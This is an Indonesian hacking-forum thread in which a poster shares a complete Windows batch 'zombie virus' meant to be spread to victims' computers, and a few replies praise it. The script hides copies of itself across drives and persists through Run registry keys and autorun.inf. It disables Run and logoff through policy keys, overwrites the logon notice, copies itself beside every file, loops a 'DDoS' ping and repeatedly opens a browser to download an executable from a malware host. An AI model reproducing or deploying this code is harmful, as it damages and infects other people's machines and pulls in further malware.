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SELAMAT Datang Di Cmonhackns ===> Mulailah dari yang kecil... karena semua yang besar dulunya juga kecil..


 Zombie Virus

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3 posters
Ryan San Rakagi
Ryan San Rakagi

Jumlah posting : 260
Join date : 2011-04-19
Age : 29
Lokasi : CIREBON

Zombie Virus Empty
PostSubject: Zombie Virus   Zombie Virus Icon_minitime1Sat Jul 21, 2012 8:28 pm

Hmmz , Pasti Udah Taukan Virus Zombie Itu Paling Susah untuk Diberantas....

Nah Kali Ini Saya Akan Ajarkan Gimana Membuat Virus Tersebut Dengan Tangan Sendiri , And Untuk Selanjut Nya Di Kembangin Sendiri Dan pasti Nya Jangan DIsalah Gunakan Ea Zombie Virus 508727 Zombie Virus 508727

Ok Langsung Aja Tpi Baca NB Nya Dlu Biar GX Salah Pengertian nanti

1.Jangan sekali-kali mencoba di komputer sendiri karena zombie ini untuk di komputer victim/korban.
jadi ini harus di sebar ke komputer orang lain agar menjadi wadah zombie ini jalan.

2.Cara kerjanya mudah sekali tinggal di klik zombie jalan.
efek yang bisa di lihat ketika komputer telah shutdown atau logoff

3.ketika komputer hidup dari logoff atau shutdown zombie ini akan menciptakan 2 anakan zombie,1 worm,autorun dan 1 file pendukung untuk me jalankan 2 zombie dan 1 worm.

anakan zombie 1 dengan nama boot.bat
untuk menyerang ip
ip nya bisa di ganti sesuai keinginan anda mau menyerang web apa.

anakan zombie 2 dengan nama 736F686169207761732068657265.bat
berfungis untuk mendownload file server trojan gw
yg bisa di akses di [You must be registered and logged in to see this link.]
jika kalian punya file server trojan sendiri bisa di tambahkan.

teakhir 1 worm untuk penyebaran,dan pertahanan.


::Prompt di baca off::
echo off

::Memberi judul prompt::
title 736F686169207761732068657265

::Memberi warna background hitam dan tulisan hijau muda::
color 0a

::Menghapus layar Prompt::

::Membuat anakan 1 dengan nama wxhshell.vbs :
echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs
echo "cmd" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs
echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs
echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs
echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs
echo "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\windows\system32\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs   
echo "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs   
echo "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs
echo "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs   
echo "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs
echo "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs

::Membuat anakan Zombie 1 dengan nama boot.bat dan memmiliki fungsi untuk DDOS::
echo echo off >>C:\windows\system32\boot.bat
echo title 0x44444F5320762C736F686169 >>C:\windows\system32\boot.bat
echo mode 67,16 >>C:\windows\system32\boot.bat
echo color 0c >>C:\windows\system32\boot.bat
echo cls >>C:\windows\system32\boot.bat
echo :DDOS >>C:\windows\system32\boot.bat
echo echo Attacking Server >>C:\windows\system32\boot.bat
echo ping -i 100000 -t >nul >>C:\windows\system32\boot.bat
echo goto DDOS >>C:\windows\system32\boot.bat

::Membuat anakan Zombie 2 dengan nama 736F686169207761732068657265.bat tolong bahasa hexa ini JANGAN di ubah::
echo echo off >>C:\windows\system32\736F686169207761732068657265.bat
echo color 0a >>C:\windows\system32\736F686169207761732068657265.bat
echo cls >>C:\windows\system32\736F686169207761732068657265.bat
echo :736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat
::connect ke ripway untuk mendownload file sex.exe::
echo start firefox "http://h1.malware-site.www/hack02/sex.exe" >>C:\windows\system32\736F686169207761732068657265.bat
echo goto 736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat

::Membuat pertahanan untuk worm 7461737961.bat berbentuk folder::

::membuat pertahhanan untuk zombie2 berbentuk folder aux::

::Membuat Worm1 di tambah fungsi manipulasi regedit,dan penyebaran::
echo echo off >>C:\CON\7461737961.bat
echo cls >>C:\CON\7461737961.bat
echo color oa >>C:\CON\7461737961.bat
::Fungsi manipulasi::
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000 >>C:\CON\7461737961.bat
echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoStartMenuMorePrograms" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "S.O.H.A.I Was Here" /f >>C:\CON\7461737961.bat
echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Hack by S.O.H.A.I" >>C:\CON\7461737961.bat
echo For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R D":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R E":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat
echo For /R F":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat

::Membuat C:\windows\system32\boot.bat tercopy pada drive C D E F ::
copy "C:\windows\system32\boot.bat" "C:\boot.bat"
copy "C:\windows\system32\boot.bat" "D:\boot.bat"
copy "C:\windows\system32\boot.bat" "E:\boot.bat"
copy "C:\windows\system32\boot.bat" "F:\boot.bat"

::Membuat C:\CON\7461737961.bat tercopy pada folder CON D E F ::
copy "C:\CON\7461737961.bat" "D:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "E:\CON\7461737961.bat"
copy "C:\CON\7461737961.bat" "F:\CON\7461737961.bat"

::Membuat C:\CON\7461737961.bat tercopy pada folder aux D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"

:::membuat C:\windows\system32\736F686169207761732068657265.bat tercopy pada folder C D E F ::
copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat"
copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat"

::Membuat boot.bat , 736F686169207761732068657265.bat dan 7461737961.bat pada drive C terhidden ::
Attrib +r +h C:\windows\system32\boot.bat
Attrib +r +h C:\windows\system32\736F686169207761732068657265.bat
Attrib +r +h C:\CON\7461737961.bat
Attrib +r +h D:\CON\7461737961.bat
Attrib +r +h E:\CON\7461737961.bat
Attrib +r +h F:\CON\7461737961.bat
Attrib +r +h C:\boot.bat
Attrib +r +h D:\boot.bat
Attrib +r +h E:\boot.bat
Attrib +r +h F:\boot.bat
Attrib +r +h C:\aux\736F686169207761732068657265.bat
Attrib +r +h D:\aux\736F686169207761732068657265.bat
Attrib +r +h E:\aux\736F686169207761732068657265.bat
Attrib +r +h F:\aux\736F686169207761732068657265.bat

::Membuat file autorun.inf di drive C dan memiliki Arti = Virus Membuat File Autorun Agar Virus bisa Berjalan Secara Otomatis::
echo [Autorun] >> C:\autorun.inf
echo shellexecute=boot.bat >> C:\autorun.inf

::Mengcopy salinan autorun.inf pada drive C ke semua drive D E F::
Copy "C:\autorun.inf" "D:\autorun.inf"
Copy "C:\autorun.inf" "E:\autorun.inf"
Copy "C:\autorun.inf" "F:\autorun.inf"

::Membuat file autorun ter hidden dari drive C D E F ::
Attrib +r +h C:\autorun.inf
Attrib +r +h D:\autorun.inf
Attrib +r +h E:\autorun.inf
Attrib +r +h F:\autorun.inf

::Proses auto running file zombie dan worm::
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wxhshell /t REG_SZ /d C:\windows\system32\wxhshell.vbs /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot /t REG_SZ /d C:\windows\system32\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot1 /t REG_SZ /d C:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot2 /t REG_SZ /d D:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot3 /t REG_SZ /d E:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot4 /t REG_SZ /d F:\boot.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F686169207761732068657265 /t REG_SZ /d C:\windows\system32\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572651 /t REG_SZ /d C:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572652 /t REG_SZ /d D:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572653 /t REG_SZ /d E:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572654 /t REG_SZ /d F:\aux\736F686169207761732068657265.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 7461737961 /t REG_SZ /d C:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379612 /t REG_SZ /d D:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379613 /t REG_SZ /d E:\CON\7461737961.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379614 /t REG_SZ /d F:\CON\7461737961.bat /f

And Jika Pc Anda Terkena Virus Ini , Saya Baru Ada Antidote Buat Zombie Nya Aja , Tpi Untuk Worm Dan Trojan Nya Sedang Dalam Identifikasi


Dan Untuk Buat Data Nya

Di Save As Dengan Nama : Zombie Anonymous.bat
Dan Save As Type Nye Di Rubah Jadi : All Files
And Save Dah

Inget Jgn Disalah Gunakan

Zombie Virus 508727 Zombie Virus 508727 Zombie Virus 508727
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Jumlah posting : 610
Join date : 2011-01-29
Age : 28
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Zombie Virus Empty
PostSubject: Re: Zombie Virus   Zombie Virus Icon_minitime1Mon Jul 23, 2012 10:58 pm

dihh keren..
ajarin yg laennya mas Zombie Virus 443313
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Jumlah posting : 1158
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PostSubject: Re: Zombie Virus   Zombie Virus Icon_minitime1Tue Jul 31, 2012 9:33 pm

kirain zombie yang ada di cso
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Ryan San Rakagi
Ryan San Rakagi

Jumlah posting : 260
Join date : 2011-04-19
Age : 29
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Zombie Virus Empty
PostSubject: Re: Zombie Virus   Zombie Virus Icon_minitime1Sat Aug 04, 2012 11:07 am

dh0rta wrote:
dihh keren..
ajarin yg laennya mas Zombie Virus 443313

Gampang Gan Klo Mau Di Ajarin Seh.....

Tinggal Request Aja Di Comment Bawah , Ntar Ane Bantu 100%

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Join date : 2011-01-29
Age : 28
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Zombie Virus Empty
PostSubject: Re: Zombie Virus   Zombie Virus Icon_minitime1Sat Jul 20, 2013 3:14 pm

apa yg bagus? :3
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PostSubject: Re: Zombie Virus   Zombie Virus Icon_minitime1

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